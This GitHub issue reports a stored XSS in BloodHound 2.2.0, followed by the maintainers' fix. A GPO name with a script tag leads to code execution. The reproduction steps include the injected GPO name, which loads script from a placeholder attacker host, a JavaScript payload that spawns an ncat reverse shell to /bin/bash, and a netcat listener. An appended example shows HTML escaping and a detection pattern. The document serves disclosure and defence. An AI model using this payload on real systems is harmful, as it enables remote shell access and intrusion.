BloodHoundAD/BloodHound

Code execution in Bloodhound via malicious AD Object

6661620a opened this issue · 5 comments

Dear Bloodhound Team –

I identified a way to achieve code execution in Bloodhound 2.2.0 by creating a GPO with a name containing JavaScript code that will trigger in Bloodhound's search-autocomplete function. The injected JavaScript is not only a valid XSS but also allows the creation of a child process.

The following steps are required to reproduce the vulnerability with a simple reverse shell using ncat:

  1. Create a GPO with the following name:
    aaaaaa<SCRIPT SRC="http://<attacker host>:<some port>/poc.js">

  2. Run Sharphound
    Invoke-BloodHound -Stealth

  3. Import collected data

  4. Host the following js payload as POC.JS (all uppercase is important here since the sharphound output json always has the value for the name field in upper case)
    const { spawn } = require('child_process');
    spawn('ncat', ['-e', '/bin/bash', '<attacker host>', '<some port>']);

    e.g. with python -m SimpleHTTPServer <some port>

  5. Start listener
    nc -v -l -p <some port>

  6. Search for "aa" in Bloodhound and catch the shell

I suppose there is still a lot of room for improving the actual exploit. Probably there are better strings to make it trigger on than "aaaaa" and I also would not consider JavaScript as one of my strengths but I hope I could prove my point here :)

I also made a video
Vimeo Bloodhound PoC

Hi, I am sure to understand the purpose of the GPO during the entire process - could you clarify please? Sylvain


A GPO can have all sorts of characters in its name. That's where the JavaScript payload is placed. The GPO has no other purpose than being read by sharphound and "exporting" the payload to sharphound's json output.

I've pushed a potential fix for the issue in c48afcb

Going to test it a bit more as well

The fix properly renders the characters as text, not as HTML tags. I also deployed a fix to another potentially injectable portion of the UI at the same time. @6661620a tested my fix as well and confirmed it works. I'm going to close this issue, and push a release out containing this fix.

Thanks again @6661620a !
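The fix described above comes down to rendering collected object names as text rather than as HTML. The following is an added example, not BloodHound's own code: it contrasts a render function that concatenates a name straight into markup with one that escapes it first, and adds a pre-import check that flags collected objects whose names contain markup. The function names, the `Name` field and the GPO name (with placeholder host and port) are assumptions constructed for the example.

```javascript
// Added example (not BloodHound's code). Runs in Node without dependencies.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can change HTML structure.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the AD object name is concatenated into markup, so a
// name that contains a tag becomes a tag once this string is assigned to
// innerHTML (or any equivalent "render as HTML" path in the UI).
function renderSuggestionUnsafe(name) {
  return `<li class="suggestion">${name}</li>`;
}

// Fixed pattern: the name is escaped first, so the browser shows the literal
// characters '<SCRIPT ...>' and never fetches or runs a script.
function renderSuggestionSafe(name) {
  return `<li class="suggestion">${escapeHtml(name)}</li>`;
}

// Defender-side check run over collected objects before import: return the
// names that would introduce an HTML tag. SharpHound upper-cases names, so the
// match is case-insensitive.
const MARKUP_RE = /<\s*\/?\s*[a-z][^>]*>/i;
function findMarkupNames(objects) {
  return objects.filter((o) => MARKUP_RE.test(o.Name)).map((o) => o.Name);
}

// Constructed sample mirroring the GPO name from this issue (placeholders,
// not a real host), already upper-cased the way the collector output is.
const GPO_NAME = 'AAAAAA<SCRIPT SRC="http://ATTACKER-HOST:PORT/POC.JS">';
const SAMPLE_OBJECTS = [{ Name: GPO_NAME }, { Name: 'DEFAULT DOMAIN POLICY' }];

console.log('unsafe :', renderSuggestionUnsafe(GPO_NAME));
console.log('safe   :', renderSuggestionSafe(GPO_NAME));
console.log('flagged:', findMarkupNames(SAMPLE_OBJECTS));
```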